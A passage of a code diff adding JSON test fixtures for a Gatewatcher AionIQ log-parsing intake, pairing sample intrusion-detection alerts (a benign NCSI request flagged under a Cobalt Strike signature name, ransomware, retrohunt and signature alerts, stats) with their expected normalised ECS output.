\"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n    \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"signature_id\": 2031071,\n    \"gid\": 1,\n    \"category\": \"Network Behavior Analytics\",\n    \"action\": \"allowed\",\n    \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n    \"metadata\": {\n      \"performance_impact\": [\n        \"High\"\n      ],\n      \"signature_severity\": [\n        \"CRITICAL\"\n      ]\n    },\n    \"rev\": 1,\n    \"stream\": 1\n  },\n  \"http\": {\n    \"url\": \"/connecttest.txt\",\n    \"http_user_agent\": \"Microsoft NCSI\",\n    \"version\": \"HTTP/1.1\",\n    \"hostname\": \"www.msftconnecttest.com\",\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response\": {\n      \"bytes\": 22,\n      \"status_code\": 200,\n      \"mime_type\": \"text/plain\"\n    }\n  },\n  \"url\": {\n    \"domain\": \"www.msftconnecttest.com\",\n    \"path\": \"/connecttest.txt\"\n  },\n  \"user_agent\": {\n    \"original\": \"Microsoft NCSI\"\n  },\n  \"packet_info\": {\n    \"linktype\": 1\n  },\n  \"flow\": {\n    \"bytes_toclient\": 700,\n    \"pkts_toclient\": 3,\n    \"bytes_toserver\": 407,\n    \"pkts_toserver\": 4,\n    \"start\": \"2022-09-01T16:06:15.602042+0000\"\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "network_behavior_analytics",
+      "severity": 2
+    },
+    "@timestamp": "2022-09-01T16:06:51.664000Z",
+    "destination": {
+      "address": "13.107.4.52",
+      "ip": "13.107.4.52",
+      "mac": "00:08:e3:ff:fc:28",
+      "port": 80
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2022-09-01T16:06:15.605000Z",
+        "id": "730a47f1-f7b1-4faa-9d61-8a41d7b138ed"
+      },
+      "flow": {
+        "bytes_toclient": 700,
+        "bytes_toserver": 407,
+        "pkts_toclient": 3,
+        "pkts_toserver": 4,
+        "start": "2022-09-01T16:06:15.602042Z"
+      },
+      "http": {
+        "hostname": "www.msftconnecttest.com"
+      },
+      "nba": {
+        "action": "allowed",
+        "category": "Network Behavior Analytics",
+        "gid": "1",
+        "metadata": {
+          "performance_impact": [
+            "High"
+          ],
+          "signature_severity": [
+            "CRITICAL"
+          ]
+        },
+        "packet": "AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA",
+        "payload": "R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K",
+        "payload_printable": "GET /connecttest.txt HTTP/1.1\r\nPragma: no-cache\r\nUser-Agent: Microsoft NCSI\r\nHost: www.msftconnecttest.com\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\n\r\n",
+        "rev": "1",
+        "signature": "NBA C&C tracker : cobalt strike tcp initialization",
+        "signature_id": "2031071",
+        "stream": "1"
+      },
+      "network": {
+        "flow_id": 2071994639527866,
+        "timestamp": "2022-09-01T16:06:15.605000Z",
+        "tx_id": 0
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-interne-rd-55.gatewatcher.com",
+          "ingress": {
+            "interface": {
+              "name": "mon0"
+            }
+          },
+          "version": "2.5.3.107"
+        },
+        "log_format_version": "1.0.0"
+      },
+      "version": "1"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 22,
+        "mime_type": "text/plain"
+      },
+      "version": "HTTP/1.1"
+    },
+    "network": {
+      "community_id": "1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=",
+      "protocol": "http",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-interne-rd-56.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-interne-rd-56.gatewatcher.com",
+        "www.msftconnecttest.com"
+      ],
+      "ip": [
+        "10.2.6.250",
+        "13.107.4.52"
+      ]
+    },
+    "source": {
+      "address": "10.2.6.250",
+      "ip": "10.2.6.250",
+      "mac": "00:50:56:91:73:14",
+      "port": 50886
+    },
+    "url": {
+      "domain": "www.msftconnecttest.com",
+      "path": "/connecttest.txt",
+      "registered_domain": "msftconnecttest.com",
+      "subdomain": "www",
+      "top_level_domain": "com"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Other",
+      "original": "Microsoft NCSI",
+      "os": {
+        "name": "Other"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/ransomware.json b/GateWatcher/aioniq_ecs/tests/ransomware.json
new file mode 100644
index 000000000..38d350641
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/ransomware.json
@@ -0,0 +1,87 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"source\": {\n    \"ip\": \"172.31.47.105\",\n    \"port\": 50066\n  },\n  \"event\": {\n    \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n    \"dataset\": \"alert\",\n    \"end\": \"2024-09-13T09:09:11.988000\",\n    \"module\": \"ransomware_detect\",\n    \"kind\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"start\": \"2024-09-13T09:08:51.988000\",\n    \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n    \"severity\": 1\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"log_format_version\": \"1.0.0\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"version\": \"2.5.4.0-rc1\",\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n  },\n  \"destination\": {\n    \"ip\": \"172.31.33.0\",\n    \"port\": 445\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ransomware\": {\n    \"alert_threshold\": 648,\n    \"malicious_behavior_confidence\": 80,\n    \"session_score\": 37\n  },\n  \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n  \"smb\": {\n    \"session_id\": 593737889611873\n  },\n  \"network\": {\n    \"protocol\": \"smb\",\n    \"flow_id\": 1465670492342121,\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n    \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n  },\n  \"@version\": \"1\"\n}"
+  },
+  "expected": {
+    "message": "{\n  \"source\": {\n    \"ip\": \"172.31.47.105\",\n    \"port\": 50066\n  },\n  \"event\": {\n    \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n    \"dataset\": \"alert\",\n    \"end\": \"2024-09-13T09:09:11.988000\",\n    \"module\": \"ransomware_detect\",\n    \"kind\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"start\": \"2024-09-13T09:08:51.988000\",\n    \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n    \"severity\": 1\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"log_format_version\": \"1.0.0\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"version\": \"2.5.4.0-rc1\",\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n  },\n  \"destination\": {\n    \"ip\": \"172.31.33.0\",\n    \"port\": 445\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ransomware\": {\n    \"alert_threshold\": 648,\n    \"malicious_behavior_confidence\": 80,\n    \"session_score\": 37\n  },\n  \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n  \"smb\": {\n    \"session_id\": 593737889611873\n  },\n  \"network\": {\n    \"protocol\": \"smb\",\n    \"flow_id\": 1465670492342121,\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n    \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n  },\n  \"@version\": \"1\"\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "ransomware_detect",
+      "severity": 1
+    },
+    "@timestamp": "2024-09-13T09:11:39.629080Z",
+    "destination": {
+      "address": "172.31.33.0",
+      "ip": "172.31.33.0",
+      "port": 445
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-13T09:11:20.223813Z",
+        "id": "f357f7d1-e322-4f67-b798-50d05f54204b"
+      },
+      "network": {
+        "flow_id": 1465670492342121,
+        "timestamp": "2024-09-13T09:08:44.877000Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "ransomware": {
+        "alert_threshold": "648",
+        "malicious_behavior_confidence": "80",
+        "session_score": "37"
+      },
+      "smb": {
+        "session_id": 593737889611873
+      },
+      "version": "1"
+    },
+    "network": {
+      "community_id": "1:RA5iYDlaiu3WMutFLj5r//rbk34=",
+      "protocol": "smb",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "172.31.33.0",
+        "172.31.47.105"
+      ]
+    },
+    "source": {
+      "address": "172.31.47.105",
+      "ip": "172.31.47.105",
+      "port": 50066
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/retrohunt.json b/GateWatcher/aioniq_ecs/tests/retrohunt.json
new file mode 100644
index 000000000..2ac0df9b6
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/retrohunt.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"id\": \"\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"retrohunt\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"ether\": \"\"\n  },\n  \"source\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"80\"\n  },\n  \"destination\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"8080\"\n  },\n  \"matched_event\": {\n    \"id\": \"1\"\n  },\n  \"ioc\": {\n    \"id\": \"1\"\n  },\n  \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"id\": \"\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"retrohunt\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"ether\": \"\"\n  },\n  \"source\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"80\"\n  },\n  \"destination\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"8080\"\n  },\n  \"matched_event\": {\n    \"id\": \"1\"\n  },\n  \"ioc\": {\n    \"id\": \"1\"\n  },\n  \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "retrohunt",
+      "severity": 2
+    },
+    "@timestamp": "2022-09-01T12:49:07.749000Z",
+    "destination": {
+      "address": "127.0.0.1",
+      "ip": "127.0.0.1",
+      "port": 8080
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2022-12-14T09:51:30.455000Z",
+        "id": "8223b432-7e97-4570-a29d-254f41dbb9db"
+      },
+      "matched_event": {
+        "id": "1"
+      }
+    },
+    "related": {
+      "ip": [
+        "127.0.0.1"
+      ]
+    },
+    "source": {
+      "address": "127.0.0.1",
+      "ip": "127.0.0.1",
+      "port": 80
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
new file mode 100644
index 000000000..2994c798a
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
@@ -0,0 +1,127 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{  \n  \"observer\": {    \n    \"vendor\": \"gatewatcher\",    \n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",    \n    \"gcap\": {      \n      \"ingress\": {        \n        \"interface\": {          \n         \"name\": \"monvirt\"        \n         }      \n       },      \n    \"hostname\": \"gcap-clement-l.gatewatcher.fr\",      \n    \"version\": \"2.5.4.0-rc1\"    \n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:6f:37:76:51:45\",\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"http.dottedquadhost.pdf\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n    \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 0,\n    \"flow_id\": 1331841998337663\n  },\n  \"destination\": {\n    \"mac\": \"00:43:70:57:75:55\",\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"flow\": {\n    \"bytes_toclient\": 1362,\n    \"bytes_toserver\": 358,\n    \"pkts_toclient\": 3,\n    \"start\": \"2024-09-11T13:55:01.079487+0000\",\n    \"pkts_toserver\": 4\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 1135\n    }\n  },\n  \"sigflow\": {\n    \"action\": \"allowed\",\n    \"metadata\": {\n      \"signature_severity\": [\n        \"Informational\"\n      ],\n      \"attack_target\": [\n        \"Client_Endpoint\"\n      ],\n      \"created_at\": [\n        \"2019_04_23\"\n      ],\n      \"deployment\": [\n        \"Perimeter\"\n      ],\n      \"performance_impact\": [\n        \"Significant\"\n      ],\n      \"updated_at\": [\n        \"2022_11_21\"\n      ]\n    },\n    \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n    \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n    \"stream\": 1,\n    \"signature_id\": 2027265,\n    \"rev\": 4,\n    \"category\": \"Potentially Bad Traffic\",\n    \"gid\": 1,\n    \"packet_info\": {\n      \"linktype\": 1\n    },\n    \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n  },\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"sigflow_alert\",\n    \"severity\": 2,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n    \"created\": \"2024-09-11T13:55:01.080901+0000\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{  \n  \"observer\": {    \n    \"vendor\": \"gatewatcher\",    \n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",    \n    \"gcap\": {      \n      \"ingress\": {        \n        \"interface\": {          \n         \"name\": \"monvirt\"        \n         }      \n       },      \n    \"hostname\": \"gcap-clement-l.gatewatcher.fr\",      \n    \"version\": \"2.5.4.0-rc1\"    \n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:6f:37:76:51:45\",\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"http.dottedquadhost.pdf\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n    \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 0,\n    \"flow_id\": 1331841998337663\n  },\n  \"destination\": {\n    \"mac\": \"00:43:70:57:75:55\",\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"flow\": {\n    \"bytes_toclient\": 1362,\n    \"bytes_toserver\": 358,\n    \"pkts_toclient\": 3,\n    \"start\": \"2024-09-11T13:55:01.079487+0000\",\n    \"pkts_toserver\": 4\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 1135\n    }\n  },\n  \"sigflow\": {\n    \"action\": \"allowed\",\n    \"metadata\": {\n      \"signature_severity\": [\n        \"Informational\"\n      ],\n      \"attack_target\": [\n        \"Client_Endpoint\"\n      ],\n      \"created_at\": [\n        \"2019_04_23\"\n      ],\n      \"deployment\": [\n        \"Perimeter\"\n      ],\n      \"performance_impact\": [\n        \"Significant\"\n      ],\n      \"updated_at\": [\n        \"2022_11_21\"\n      ]\n    },\n    \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n    \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n    \"stream\": 1,\n    \"signature_id\": 2027265,\n    \"rev\": 4,\n    \"category\": \"Potentially Bad Traffic\",\n    \"gid\": 1,\n    \"packet_info\": {\n      \"linktype\": 1\n    },\n    \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n  },\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"sigflow_alert\",\n    \"severity\": 2,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n    \"created\": \"2024-09-11T13:55:01.080901+0000\"\n  }\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "sigflow_alert",
+      "severity": 2
+    },
+    "@timestamp": "2024-09-11T13:55:34.006000Z",
+    "destination": {
+      "address": "56.53.117.115",
+      "ip": "56.53.117.115",
+      "mac": "00:43:70:57:75:55",
+      "port": 80
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-11T13:55:01.080901Z",
+        "id": "58c28570-6c90-4ba9-b9b5-f72867d5fa08"
+      },
+      "flow": {
+        "bytes_toclient": 1362,
+        "bytes_toserver": 358,
+        "pkts_toclient": 3,
+        "pkts_toserver": 4,
+        "start": "2024-09-11T13:55:01.079487Z"
+      },
+      "http": {
+        "hostname": "56.53.117.115"
+      },
+      "metadata": {
+        "flowbits": [
+          "http.dottedquadhost.pdf"
+        ]
+      },
+      "network": {
+        "flow_id": 1331841998337663,
+        "timestamp": "2024-09-11T13:55:01.080901Z",
+        "tx_id": 0
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "sigflow": {
+        "action": "allowed",
+        "category": "Potentially Bad Traffic",
+        "gid": 1,
+        "metadata": "{\"attack_target\": [\"Client_Endpoint\"], \"created_at\": [\"2019_04_23\"], \"deployment\": [\"Perimeter\"], \"performance_impact\": [\"Significant\"], \"signature_severity\": [\"Informational\"], \"updated_at\": [\"2022_11_21\"]}",
+        "packet": "AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA",
+        "packet_info": "{\"linktype\": 1}",
+        "payload": "R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
+        "payload_printable": "GET /malcore_10KB_clean.pdf HTTP/1.1\r\nHost: 56.53.117.115\r\nAccept-Encoding: gzip,compress,deflate\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\n\r\n",
+        "rev": 4,
+        "signature": "ET INFO Dotted Quad Host PDF Request",
+        "signature_id": 2027265,
+        "stream": 1
+      },
+      "version": "1"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 1135,
+        "mime_type": "application/pdf",
+        "status_code": 200
+      },
+      "version": "HTTP/1.1"
+    },
+    "network": {
+      "community_id": "1:8T6+TppVoaMkXwi+BTjnzAYozVc=",
+      "protocol": "http",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "56.53.117.115",
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "56.53.117.115",
+        "65.100.113.120"
+      ]
+    },
+    "source": {
+      "address": "65.100.113.120",
+      "ip": "65.100.113.120",
+      "mac": "00:6f:37:76:51:45",
+      "port": 62832
+    },
+    "url": {
+      "domain": "56.53.117.115",
+      "path": "/malcore_10KB_clean.pdf"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
new file mode 100644
index 000000000..f6c5e07ee
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
@@ -0,0 +1,48 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\"\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"metric\",\n    \"dataset\": \"system_metrics\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"sigflow_stats\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"stats\": {\n    \"app_layer\": {},\n    \"tcp\": {},\n    \"uptime\": 443637,\n    \"ftp\": {},\n    \"flow_bypassed\": {},\n    \"decoder\": {},\n    \"detect\": {},\n    \"defrag\": {},\n    \"flow\": {},\n    \"capture\": {},\n    \"http\": {},\n    \"file_store\": {}\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\"\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"metric\",\n    \"dataset\": \"system_metrics\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"sigflow_stats\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"stats\": {\n    \"app_layer\": {},\n    \"tcp\": {},\n    \"uptime\": 443637,\n    \"ftp\": {},\n    \"flow_bypassed\": {},\n    \"decoder\": {},\n    \"detect\": {},\n    \"defrag\": {},\n    \"flow\": {},\n    \"capture\": {},\n    \"http\": {},\n    \"file_store\": {}\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system_metrics",
+      "kind": "metric",
+      "module": "sigflow_stats"
+    },
+    "@timestamp": "2022-09-01T10:49:46.643000Z",
+    "gatewatcher": {
+      "event": {
+        "created": "2022-12-14T09:51:30.455000Z",
